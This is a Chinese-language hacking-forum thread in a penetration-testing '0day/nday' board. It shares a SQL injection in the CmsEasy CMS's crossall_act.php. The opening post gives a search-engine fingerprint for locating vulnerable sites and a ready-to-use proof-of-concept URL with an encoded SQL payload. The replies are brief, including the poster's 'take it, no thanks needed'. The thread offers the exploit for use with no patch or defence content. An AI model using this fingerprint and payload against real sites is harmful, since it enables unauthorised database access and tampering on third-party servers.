设为首页收藏本站
开启辅助访问 切换到宽版

吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
吾要学习网»论坛 渗透测试 0day/nday分享区 CmsEasy crossall_act.php SQL注入漏洞
返回列表 发新帖
查看: 634|回复: 2

CmsEasy crossall_act.php SQL注入漏洞

[复制链接]
admin
  • TA的每日心情

    昨天 21:42

    • 签到天数: 56 天

    连续签到: 6 天

    [LV.5]常住居民I

    409

    主题

    414

    帖子

    3661

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    3661
    发表于 2025-9-22 10:35:44 | 显示全部楼层 |阅读模式
    CmsEasy 存在SQL注入漏洞,通过文件 service.php 加密SQL语句执行即可执行任意SQL命令



    网络测绘:body="cmseasyedit"



    POC  /?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5



    1.每日签到,不仅是积分的累积,更是自我坚持的浪漫宣言。
    回复

    使用道具 举报

    gaodahai
  • TA的每日心情
    擦汗
    2025-9-24 16:58

    • 签到天数: 1 天

    连续签到: 1 天

    [LV.1]初来乍到

    0

    主题

    2

    帖子

    25

    积分

    新手上路

    Rank: 1

    积分
    25
    发表于 2025-9-24 17:02:32 | 显示全部楼层
    很老的洞了啊
    回复

    使用道具 举报

    admin
  • TA的每日心情

    昨天 21:42

    • 签到天数: 56 天

    连续签到: 6 天

    [LV.5]常住居民I

    409

    主题

    414

    帖子

    3661

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    3661
     楼主| 发表于 2025-9-24 17:12:21 | 显示全部楼层
    拿走不谢
    1.每日签到,不仅是积分的累积,更是自我坚持的浪漫宣言。
    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|手机版|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-12-7 12:20 , Processed in 0.175927 second(s), 25 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表